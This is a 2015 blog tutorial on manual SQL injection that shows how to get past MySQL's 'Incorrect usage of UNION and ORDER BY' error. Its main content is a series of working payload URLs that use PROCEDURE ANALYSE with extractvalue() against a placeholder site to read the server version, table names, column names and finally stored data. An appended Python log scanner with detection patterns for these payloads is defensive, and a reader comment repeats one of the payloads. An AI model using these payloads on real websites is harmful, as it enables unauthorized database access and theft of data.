
Wednesday, 8 July 2015

Bypassing Incorrect Usage of UNION and ORDER BY -Tutorial


By RAi Jee
The previous tutorial discussed bypassing the error "Allowed Memory Size of XXXX Bytes Exhausted".
Today's topic is how to bypass the "Incorrect usage of UNION and ORDER BY" error.
So let's start the manual injection. The target site is vulnerable to SQL injection.

Now we will try to find the total number of columns, using ORDER BY to count them.
Here is our query:

http://www.FakSite.com/detail.php?id=12 order by 6-- -

We got an error here:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 5-- -,10' at line 1





Let's decrease the column count from 6 to 3:
http://www.FakSite.com/detail.php?id=12 order by 3-- -

Still the same error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 3 -- -,10' at line 1

Now try ORDER BY with only one column:




http://www.FakSite.com/detail.php?id=12 order by 1-- -

We got the same error again:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- -,10' at line 1

The same error again, even with a column count of 1. So now we will try to guess the number of columns ourselves.
We will send a UNION SELECT statement with 3 columns.
Our query will be:

http://www.FakSite.com/detail.php?id=12 UnION SEleCT 1,2,3-- -

After executing our query we got this error:
"Incorrect usage of UNION and ORDER BY"
MySQL raises this error when UNION follows an unparenthesised SELECT that already contains ORDER BY.
As you can see, we cannot inject with a UNION SELECT query here.
So we use PROCEDURE ANALYSE with the XPath function extractvalue() to bypass the "Incorrect usage of UNION and ORDER BY" error.
Here is the PROCEDURE ANALYSE query with extractvalue():

http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,0x524169204a6565,0x3a,@@version)),1)-- -

Bingo, the error is gone!

Since the query asked for @@version, the server version is displayed in the response (shown in a screenshot in the original post).

Now let's add the query for tables:
http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)-- -
We got the tables, but only some of the table names are shown.
To get the rest, we add the substr function to the query to read the other tables from the database:
http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select substr(group_concat(table_name),10,50) from information_schema.tables where table_schema=database()))),1)-- -

Increase the values 10,50 in the query to get the other tables in the database.
Next we have to get the column names from our targeted table.
Here is the query for getting column names:

http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(column_name) from information_schema.columns where table_name='OUR TABLE_NAME HERE'))),1)-- -

The last part is extracting data from the columns.
Here is the final query for extracting data from columns:

http://www.FakSite.com/detail.php?id=12 Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(OUR_COLUMN_HERE) from OUR_TABLE_NAME_HERE))),1)-- -

AUTHOR: Rai Muzammal Hussain a.k.a. RAi Jee
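
The requests used in this tutorial leave a recognisable trace in web server access logs. The Python below is an added example, not part of the original post: it decodes each logged request and flags the ORDER BY probe, UNION SELECT, PROCEDURE ANALYSE, extractvalue and information_schema patterns shown above. The log lines, IP address and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule name -> pattern, applied to the decoded, lower-cased query string.
RULES = {
    "order_by_probe":     re.compile(r"\border\s+by\s+\d+"),
    "union_select":       re.compile(r"\bunion\s+(all\s+)?select\b"),
    "procedure_analyse":  re.compile(r"\bprocedure\s+analyse\s*\("),
    "xpath_error_func":   re.compile(r"\bextractvalue\s*\("),
    "schema_enumeration": re.compile(r"\binformation_schema\b"),
    "trailing_comment":   re.compile(r"(--[\s-]*|#)$"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def normalise(raw_query):
    """Decode and flatten a query string so every rule sees one canonical form."""
    text = raw_query
    for _ in range(2):                       # second pass catches double URL-encoding
        text = unquote_plus(text)
    text = re.sub(r"/\*.*?\*/", " ", text)   # inline SQL comments standing in for spaces
    return re.sub(r"\s+", " ", text).strip().lower()


def classify(log_line):
    """Return the names of all rules matched by the request in one access-log line."""
    match = REQUEST.search(log_line)
    if not match or "?" not in match.group(1):
        return []
    query = normalise(match.group(1).split("?", 1)[1])
    return [name for name, rx in RULES.items() if rx.search(query)]


# Constructed sample lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jul/2015:10:01:02 +0000] "GET /detail.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [08/Jul/2015:10:01:09 +0000] "GET /detail.php?id=12%20order%20by%206--%20- HTTP/1.1" 200 310',
    '203.0.113.7 - - [08/Jul/2015:10:01:30 +0000] "GET /detail.php?id=12%20UnION%20SEleCT%201,2,3--%20- HTTP/1.1" 200 298',
    '203.0.113.7 - - [08/Jul/2015:10:02:11 +0000] "GET /detail.php?id=12+Procedure/**/Analyse+'
    '(extractvalue(0,concat(0x27,@@version)),1)--+- HTTP/1.1" 200 305',
    '203.0.113.7 - - [08/Jul/2015:10:02:40 +0000] "GET /detail.php?id=12+Procedure+Analyse+'
    '(extractvalue(0,concat(0x27,(select+group_concat(table_name)+from+information_schema.tables'
    '+where+table_schema=database()))),1)--+- HTTP/1.1" 200 330',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or "clean", "<-", line.split('"')[1])
```
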

2 comments:

  1. Your blog has given me that thing which I never expect to get from all over the websites. Nice post guys!

    App Developer

  2. When I put Procedure Analyse (extractvalue(0,concat(0x27,(select group_concat(column_name) from information_schema.tables where table_name='OUR TABLE_NAME HERE'))),1)-- -, I get the following message: Warning: Unknown column 'column_name' in 'field list'.
    Do you know how to resolve it?
